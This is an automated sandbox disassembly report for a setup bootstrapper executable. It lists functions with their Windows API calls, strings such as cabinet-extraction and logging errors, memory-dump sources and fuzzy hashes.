Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
API String ID: 1866314245-2276003667
Opcode ID: f69d43b0707ccd7b04ba4373314d9d449586d19353bb0fc60aef66bfcdc0e63e
Instruction ID: 647e38f30012e0a42f52b27f4d9d9b8b565d3e3c11404a9d16c291803645c9bb
Opcode Fuzzy Hash: f69d43b0707ccd7b04ba4373314d9d449586d19353bb0fc60aef66bfcdc0e63e
Instruction Fuzzy Hash: 2E11EB37A81733A7CB2556945C05F7B7AE4AF04BA1F0186A5FE28FB190DBA0DC0086D0

Function 00B7F812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00B7F942
RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00B7F94F

Strings

Resume, xrefs: 00B7F8B6
Failed to open registration key., xrefs: 00B7F8AB
%ls.RebootRequired, xrefs: 00B7F82F
Failed to format pending restart registry key to read., xrefs: 00B7F846
Failed to read Resume value., xrefs: 00B7F8D8

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: Close
String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
API String ID: 3535843008-3890505273
Opcode ID: d3c1f931528f0672f1a15bda043d36e004b21d700a9be201e6062d5cbf4c9d3c
Instruction ID: 5288fa198099d56ba0a7ab5dd007be1c854d367353df64a54d452d478a4f2ca2
Opcode Fuzzy Hash: d3c1f931528f0672f1a15bda043d36e004b21d700a9be201e6062d5cbf4c9d3c
Instruction Fuzzy Hash: 4F411A7190415AFFCB119F98C881BB9BBE4EF04310F55C1FAEA29AB260C371DE419B95

Function 5BB31332 Relevance: 12.1, APIs: 8, Instructions: 78libraryloadersleepCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 5BB31342
GetProcAddress.KERNEL32(00000000), ref: 5BB31357
GetProcAddress.KERNEL32(00000000), ref: 5BB31363
GetModuleFileNameW.KERNEL32(?,00000104), ref: 5BB31377
GetProcAddress.KERNEL32(00000000), ref: 5BB313E9
CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 5BB313FF
Sleep.KERNELBASE ref: 5BB31407
ExitProcess.KERNEL32(00000000), ref: 5BB3140C

Memory Dump Source

Source File: 00000002.00000002.1636265365.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1636228766.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636286490.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636322460.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636335751.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: AddressProc$ModuleProcess$CreateExitFileHandleNameSleep
String ID:
API String ID: 1148150840-0
Opcode ID: f0dd7a59c0bd5b43b3f9e5f35ad75e2b2e8d3d451f964b30678343650819a50a
Instruction ID: 29308b35581844d5fbda9ce5f776adae6960d5a29273f979bf2b02e5f9c33764
Opcode Fuzzy Hash: f0dd7a59c0bd5b43b3f9e5f35ad75e2b2e8d3d451f964b30678343650819a50a
Instruction Fuzzy Hash: C521A172504314AFE712ABA4CC44AABBBEDFF48344F10442CF181A3590FBF6A844D792

Function 00BB0523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00BDB5FC,00000000,?,?,?,00B84207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00B754FA,?), ref: 00BB0533
CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,00BDB5F4,?,00B84207,00000000,Setup), ref: 00BB05D7
GetLastError.KERNEL32(?,00B84207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00B754FA,?,?,?), ref: 00BB05E7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00B84207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00B754FA,?), ref: 00BB0621

Part of subcall function 00B72DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00B72F09

LeaveCriticalSection.KERNEL32(00BDB5FC,?,?,00BDB5F4,?,00B84207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00B754FA,?), ref: 00BB067A

Strings

logutil.cpp, xrefs: 00BB0606

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
String ID: logutil.cpp
API String ID: 4111229724-3545173039
Opcode ID: 3fa71e88e455cfd9b53131533356383bac03146cf24811d614ca37f03bf627a4
Instruction ID: 8342f2f78653e80f619d76be4a0a9f6d7554d0c26012b30b85914dea59a46568
Opcode Fuzzy Hash: 3fa71e88e455cfd9b53131533356383bac03146cf24811d614ca37f03bf627a4
Instruction Fuzzy Hash: E331C331912219EBCB216F65AD95EBBB7E8EB04754F0141E6BD11A7160EBF0CD209BA0

Function 00BB32F3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00BB3309
SysAllocString.OLEAUT32(?), ref: 00BB3325
VariantClear.OLEAUT32(?), ref: 00BB33AC
SysFreeString.OLEAUT32(00000000), ref: 00BB33B7

Strings

`5w, xrefs: 00BB33B7
xmlutil.cpp, xrefs: 00BB333C

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: `5w$xmlutil.cpp
API String ID: 760788290-26783885
Opcode ID: 0320d4efba07ca0483c0093b6610b7dfc66b8ae67d923aeaa820bf60e42a458b
Instruction ID: 44962dc20789380be6ddaf7f3ba0d5809b64b49dad6710caa8c20dfcdef09ca6
Opcode Fuzzy Hash: 0320d4efba07ca0483c0093b6610b7dfc66b8ae67d923aeaa820bf60e42a458b
Instruction Fuzzy Hash: 95216032901219AFCB11DB98C848EFFBBF9EF44B11F154198F905AB220DFB19E008B94

Function 00B90B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00B90BDE
WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00B90BFD
GetLastError.KERNEL32 ref: 00B90C07

Strings

Unexpected call to CabWrite()., xrefs: 00B90BC1
cabextract.cpp, xrefs: 00B90C2B
Failed to write during cabinet extraction., xrefs: 00B90C35

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastWrite_memcpy_s
String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
API String ID: 1970631241-3111339858
Opcode ID: 23af9e8acd60bc832c523ebfce9be84c188f2614e082a0145cb7ca901c267030
Instruction ID: 453f05dcd393217965f082a382207b7f73a5f491c33eb0506dd96d7a54902b14
Opcode Fuzzy Hash: 23af9e8acd60bc832c523ebfce9be84c188f2614e082a0145cb7ca901c267030
Instruction Fuzzy Hash: 2421CF76524205AFCF10EF5CD985E6A77F8EF84724B2142A9FE14C7251EA71D9009B60

Function 00BB0879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,00B753BD,00000000,?,?,?,?,?,?,?,00B8769D,00000000), ref: 00BB0897
GetLastError.KERNEL32(?,?,?,?,?,?,?,00B8769D,00000000), ref: 00BB08A1
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,00B8769D,00000000), ref: 00BB08D3
GetLastError.KERNEL32(?,?,?,?,?,?,?,00B8769D,00000000), ref: 00BB08EC
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00B8769D,00000000), ref: 00BB092B

Strings

procutil.cpp, xrefs: 00BB0919

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastToken$CloseHandleInformationOpenProcess
String ID: procutil.cpp
API String ID: 4040495316-1178289305
Opcode ID: 1ef00a685aeec3df1ba341d2b41f97c581c05f114e9486b5e299199bbe9ea9a7
Instruction ID: fdda6bd45a94673ca80da7b82e013508ad2a3451379cbbdc32a4adb30e7c14bf
Opcode Fuzzy Hash: 1ef00a685aeec3df1ba341d2b41f97c581c05f114e9486b5e299199bbe9ea9a7
Instruction Fuzzy Hash: 04219532D50129ABDB21AB999C45AFFFBE8EF10710F114196AD54A7250D7F08E009AD0

Function 00B90C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00B90CC4
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B90CD6
SetFileTime.KERNELBASE(?,?,?,?), ref: 00B90CE9
CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00B908B1,?,?), ref: 00B90CF8

Strings

cabextract.cpp, xrefs: 00B90C93
Invalid operation for this state., xrefs: 00B90C9D

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: Time$File$CloseDateHandleLocal
String ID: Invalid operation for this state.$cabextract.cpp
API String ID: 609741386-1751360545
Opcode ID: be7361571f5796232e7290de067e677122b119c05c1f6584c38adc904875dbad
Instruction ID: 4ac19a4d58287938e53a0402d1f33574b21daa8ba71959bc49cd5b844a54b6ef
Opcode Fuzzy Hash: be7361571f5796232e7290de067e677122b119c05c1f6584c38adc904875dbad
Instruction Fuzzy Hash: C421A17281021EAF8B10AFA8CD49DBABBFCFF0572075083A6F854D6590D7B4E951CB90

Function 00BB3565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00BB3574
InterlockedIncrement.KERNEL32(00BDB6C8), ref: 00BB3591
CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,00BDB6B8,?,?,?,?,?,?), ref: 00BB35AC
CLSIDFromProgID.OLE32(MSXML.DOMDocument,00BDB6B8,?,?,?,?,?,?), ref: 00BB35B8

Strings

Msxml2.DOMDocument, xrefs: 00BB35A7
MSXML.DOMDocument, xrefs: 00BB35B3

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: FromProg$IncrementInitializeInterlocked
String ID: MSXML.DOMDocument$Msxml2.DOMDocument
API String ID: 2109125048-2356320334
Opcode ID: 7b106c1b4c4677ee2a8b8a33d8ee049a9e5dfc7fc7d307c32b43053be4920ca9
Instruction ID: cd66add316b656ba634286fff83ee2fa4d4beb4c4e5338cf8179425f6e2dd134
Opcode Fuzzy Hash: 7b106c1b4c4677ee2a8b8a33d8ee049a9e5dfc7fc7d307c32b43053be4920ca9
Instruction Fuzzy Hash: 22F0E53074122597C7300BA27D08FABAEE5DBA0F54F0505AAEC40C3260FBE0C94187B0

Function 00BB4A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00BB4A9D
GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00BB4ACA
GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00BB4AF6
GetLastError.KERNEL32(00000000,00BBB7A0,?,00000000,?,00000000,?,00000000), ref: 00BB4B34
GlobalFree.KERNEL32(00000000), ref: 00BB4B65

Strings

fileutil.cpp, xrefs: 00BB4AB8, 00BB4B11

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$Global$AllocFree
String ID: fileutil.cpp
API String ID: 1145190524-2967768451
Opcode ID: c8efd2b50ac96ddc23982e72dd65d31d49870df85b0f741cdbefd7f6d21ac3b4
Instruction ID: 6103e56df20f82e1070514e39159d6b841b8731867a17ef7a65b893111bfdccd
Opcode Fuzzy Hash: c8efd2b50ac96ddc23982e72dd65d31d49870df85b0f741cdbefd7f6d21ac3b4
Instruction Fuzzy Hash: AE316136940229ABCB219A958C81FFFFAE8FF44750F114295EE54E7252EBB0DD0096E4

Function 00B8E956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000082,?,?), ref: 00B8E985
SetWindowLongW.USER32(?,000000EB,00000000), ref: 00B8E994
SetWindowLongW.USER32(?,000000EB,?), ref: 00B8E9A8
DefWindowProcW.USER32(?,?,?,?), ref: 00B8E9B8
GetWindowLongW.USER32(?,000000EB), ref: 00B8E9D2
PostQuitMessage.USER32(00000000), ref: 00B8EA31

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: Window$Long$Proc$MessagePostQuit
String ID:
API String ID: 3812958022-0
Opcode ID: e30b1c41eee7c391cf626fb25d20f1ab9b35448e2c299f86c78387a2491c1289
Instruction ID: 70c7b81b8c5e9d9d42240885ff4ffb8f9a281545813ffc14a4f2342f3687ba0c
Opcode Fuzzy Hash: e30b1c41eee7c391cf626fb25d20f1ab9b35448e2c299f86c78387a2491c1289
Instruction Fuzzy Hash: D8219031104104BFDB15AF68DC49E6A3BE5FF45710F144668F91AAA1B4C7B1DD10DB60

Function 00B90A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00B90B27
GetLastError.KERNEL32(?,?,?), ref: 00B90B31

Strings

cabextract.cpp, xrefs: 00B90B55
Invalid seek type., xrefs: 00B90ABD
Failed to move file pointer 0x%x bytes., xrefs: 00B90B62

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
API String ID: 2976181284-417918914
Opcode ID: bf3268fc9b9dc99801b37b0cd637e5050a4dc1b47706ffbbad5b8d4efff83d0a
Instruction ID: 7248a6b9cb735766dce768071ffcd46c74f88526682e19cb9ba6c3b1488a6be6
Opcode Fuzzy Hash: bf3268fc9b9dc99801b37b0cd637e5050a4dc1b47706ffbbad5b8d4efff83d0a
Instruction Fuzzy Hash: FA319032A5061AEFCF10EF98D884EAEB7E5FB04724B1482A5F91497660D770ED108BD0

Function 00B74115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,00B8A0E8,00000000,00000000,?,00000000,00B753BD,00000000,?,?,00B7D5B5,?), ref: 00B74123
GetLastError.KERNEL32(?,00B8A0E8,00000000,00000000,?,00000000,00B753BD,00000000,?,?,00B7D5B5,?,00000000,00000000), ref: 00B74131
CreateDirectoryW.KERNEL32(?,840F01E8,00B75489,?,00B8A0E8,00000000,00000000,?,00000000,00B753BD,00000000,?,?,00B7D5B5,?,00000000), ref: 00B7419A
GetLastError.KERNEL32(?,00B8A0E8,00000000,00000000,?,00000000,00B753BD,00000000,?,?,00B7D5B5,?,00000000,00000000), ref: 00B741A4

Strings

dirutil.cpp, xrefs: 00B741D4

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: dirutil.cpp
API String ID: 1375471231-2193988115
Opcode ID: f2cf56ccd966aeb5d0b7a5f7faaece38682006e0c80207e8a933b7895e13099f
Instruction ID: 1edf1d1a56299119251ae5406a523353382b8ff774fdafbeec707a0290c6e73d
Opcode Fuzzy Hash: f2cf56ccd966aeb5d0b7a5f7faaece38682006e0c80207e8a933b7895e13099f
Instruction Fuzzy Hash: 0D11F62660033597D7313AA54C80B3BAED4DF71B63F91C1A1FD2DBB940E7A08C809691

Function 00B83AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00BDAAA0,00000000,?,00BB57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00BB0F80

RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00B83FB5,feclient.dll,?,00000000,?,?,?,00B74B12), ref: 00B83B42

Part of subcall function 00BB10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00BB112B
Part of subcall function 00BB10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00BB1163

Strings

feclient.dll, xrefs: 00B83AAB
SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 00B83AB7
Logging, xrefs: 00B83AD4

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
API String ID: 1586453840-3596319545
Opcode ID: f90b989f9a68c78b51a4805c7141d70a325b8f8a32dac0f417a9b2cef618ce00
Instruction ID: 8a989a4914e06b0cd89f8f78f6c1200289c10575444ea4ff6ceebc245ba067f1
Opcode Fuzzy Hash: f90b989f9a68c78b51a4805c7141d70a325b8f8a32dac0f417a9b2cef618ce00
Instruction Fuzzy Hash: AC1181B2A40208ABDB21FA95DC82FBEB7F8EB10F00F8040E5E501AB061D6B19F81D710

Function 00BB0764 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenA.KERNEL32(00B912CF,00000000,00000000,?,?,?,00BB0013,00B912CF,00B912CF,?,00000000,0000FDE9,?,00B912CF,8007139F,Invalid operation for this state.), ref: 00BB0776
WriteFile.KERNELBASE(00000200,00000000,00000000,?,00000000,?,?,00BB0013,00B912CF,00B912CF,?,00000000,0000FDE9,?,00B912CF,8007139F), ref: 00BB07B2
GetLastError.KERNEL32(?,?,00BB0013,00B912CF,00B912CF,?,00000000,0000FDE9,?,00B912CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 00BB07BC

Strings

logutil.cpp, xrefs: 00BB07ED

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastWritelstrlen
String ID: logutil.cpp
API String ID: 606256338-3545173039
Opcode ID: 51c66b16b8229105a7c469e3f48d083b0852573acc176ed46f589970ce1bd51c
Instruction ID: 43bc67fee824f148e1b82c680a2f554184a21016dc5d7e310caac5c9f007c48b
Opcode Fuzzy Hash: 51c66b16b8229105a7c469e3f48d083b0852573acc176ed46f589970ce1bd51c
Instruction Fuzzy Hash: 7011A772A51124AB8710AA6A9D94DFFFBECEB44760B114395FD04E7240EFB0AD00CAE0

Function 00B909EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00B90A19,?,?,?), ref: 00B91434
Part of subcall function 00B9140C: GetLastError.KERNEL32(?,00B90A19,?,?,?), ref: 00B9143E

ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00B90A27
GetLastError.KERNEL32 ref: 00B90A31

Strings

cabextract.cpp, xrefs: 00B90A55
Failed to read during cabinet extraction., xrefs: 00B90A5F

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLast$PointerRead
String ID: Failed to read during cabinet extraction.$cabextract.cpp
API String ID: 2170121939-2426083571
Opcode ID: ac2b37849a505f077bf549c6f3bbbe0fb06b2476ecb33fe1605c862a9e0368ba
Instruction ID: 817551cc431b4744e878d1d802f2047fbe0e08513f9cdd90fd2d6263a343b1ad
Opcode Fuzzy Hash: ac2b37849a505f077bf549c6f3bbbe0fb06b2476ecb33fe1605c862a9e0368ba
Instruction Fuzzy Hash: 20118E36A51229BBCF21AF95DC04E9A7BA8FB09760B1142A5FD14A7260D7709D109BD0

